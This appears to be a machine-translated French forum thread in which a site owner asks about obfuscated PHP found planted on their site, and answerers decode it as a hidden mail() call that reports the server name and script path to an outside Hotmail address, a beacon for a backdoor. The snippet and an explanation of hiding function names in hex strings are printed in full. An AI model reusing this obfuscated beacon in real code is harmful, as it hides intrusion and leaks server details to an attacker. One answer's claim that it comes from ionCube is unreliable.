Est-ce que quelqu'un sait ce que fait ce code PHP?

Question

J'ai trouvé cela incorporé dans un fichier php sur mon site, quelqu'un peut-il me dire ce qu'il fait?

$x0b="\x6da\x69l"; 
$ms = $_SERVER["S\x45R\126\105\x52_\x4e\101\x4dE"].$_SERVER["\123\x43R\111\x50\124_NA\x4d\105"]; 
$sub = "\x73\x68\145\x6cl\x20\076\076 :\x20" . $ms; 
$o = array ("\x6fm","\164ma\151","\152\x5f\141\155\x72\x31","\x40\x68\x6f","\154.\x63"); 
$ee = $o[2].$o[3].$o[1].$o[4].$o[0]; 
$send = @$x0b($ee,$sub,$ms); 

Answer 1

Attend mal! Le script essaie d'envoyer un e-mail à j_amr1@hotmail.com.

@$x0b exécute la fonction avec le nom de $ x0b où \x6da\x69l est "mail" et @ supprime toutes les erreurs.

récepteur $ee est j_amr1@hotmail.com

Le courrier contient SERVER_NAME et SCRIPT_NAME de la variable $_SERVER[]. Vous pouvez utiliser codepad pour imprimer les chaînes.

Les chaînes sont codées S\x45R\126\105\x52_\x4e\101\x4dE. S est juste en clair. \x45 est codé en hexadécimal et \126 est un nombre de caractères.

Answer 2

Il crée 4 variables. La première variable, $ x0b, est le nom de la fonction à utiliser, "mail". Les 3 dernières variables sont à qui envoyer l'email, le sujet et le corps du message.

$ee = "j_amr1@hotmail.com" 
$sub = "shell >> : file.php" (file.php is the name of the script that contains this code) 
$ms = "file.php" (same as above) 

Vous savez que vous avez été piraté :)

Answer 3

je crois que le code PHP lui-même a été "obscurcie" (ou encodée) par un outil comme ioncube. Il ne peut être masqué que par le même outil, mais lorsqu'il est exécuté sur le serveur sur lequel il est installé, il s'exécute normalement. Espérons que cela aide

Answer 4

Ceci est assez simple obfuscation ASCII et peut être inversé tout simplement.

\ x + [0-9] est fondamentalement la forme ASCII d'une lettre, d'un caractère ou d'un chiffre.

Toute chaîne enroulée entre guillemets seront interprétés pour les caractères ASCII, par exemple:

$E = "\x45"; //E 
$R = "\x52"; //R 
$ER = "\x45\x52"; //ER 

regardant la table ASCII ci-dessous étaient à la recherche à la colonne Hx, car ceux-ci sont des codes de caractères hexadécimaux, donc maintenant, nous pouvons l'utiliser pour construire un nom de fonction dans une chaîne hexagonale et l'appeler comme ceci:

$func = "\x6D\x61\x69\x6C"; //mail 

et ensuite utiliser cette variable pour appeler une fonction comme ceci:

$e = $func($a, $b, $c, $d); 

Assez simple une fois que vous avez compris comment utiliser les représentations ASCII.

Answer 5

Il envoie un email contenant l'emplacement du script PHP à l'adresse j_amr1 @ hotmail.com

Est-ce que ce script fait partie d'une application pour laquelle vous êtes censé avoir une licence de site payant? Ce serait un moyen de vérifier pour les personnes qui l'utilisent sans payer. Ou cela pourrait faire partie d'une porte dérobée qui permet à quelqu'un de contrôler votre serveur.